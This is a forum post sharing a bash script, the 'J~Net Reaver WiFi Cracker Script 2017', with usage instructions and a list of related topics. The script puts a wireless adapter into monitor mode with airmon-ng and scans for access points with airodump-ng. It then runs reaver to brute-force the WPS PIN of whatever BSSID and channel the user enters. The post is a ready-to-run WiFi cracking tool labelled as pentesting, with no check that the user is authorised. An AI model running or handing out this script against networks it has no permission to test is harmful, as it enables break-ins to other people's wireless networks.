WiFi Reaver Auto Security Pentesting Bash Script
Page 1 of 1
WiFi Reaver Auto Security Pentesting Bash Script
Vid
Make executable:
You will need kali Or Parrot OS Or Linux OS With Reaver Installed
Usage:
- Code:
#!/bin/bash
# Usage: ./Run.sh wlan0
echo "J~Net Reaver WiFi Cracker Script 2017"
#
adaptor="$1"
if [ -z "$1" ]; then
clear
ifconfig
echo "Which Apater Do You Wish To Use?"
read adaptor
fi
#E4:3E:D7:FD:2A:D7 1
#ssid="$1"
#chan="$2"
airmon-ng start $adaptor
# wlan0mon
#
newvar=$adaptor"mon"
echo "Ctrl C To Pick A AP To Crack"
airodump-ng -i "$newvar"
echo "Enter Target BSSID"
read ssid
echo "Enter Target Channel"
read chan
reaver -i $newvar -b $ssid -vv -S -c $chan
Make executable:
- Code:
chmod +x *.sh
You will need kali Or Parrot OS Or Linux OS With Reaver Installed
Usage:
- Code:
./Run.sh wlan0
Similar topics
» Kali Linux 2 Pentesting Auto Install Pentesting Apps Script
» Linux BASH Script Running Commands and Functions From Bash Script and saving to varables
» Wifi Menu For Kali Pentesting
» Security Site Information For PenTesting
» Free Security Check Script For Linux
» Linux BASH Script Running Commands and Functions From Bash Script and saving to varables
» Wifi Menu For Kali Pentesting
» Security Site Information For PenTesting
» Free Security Check Script For Linux
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum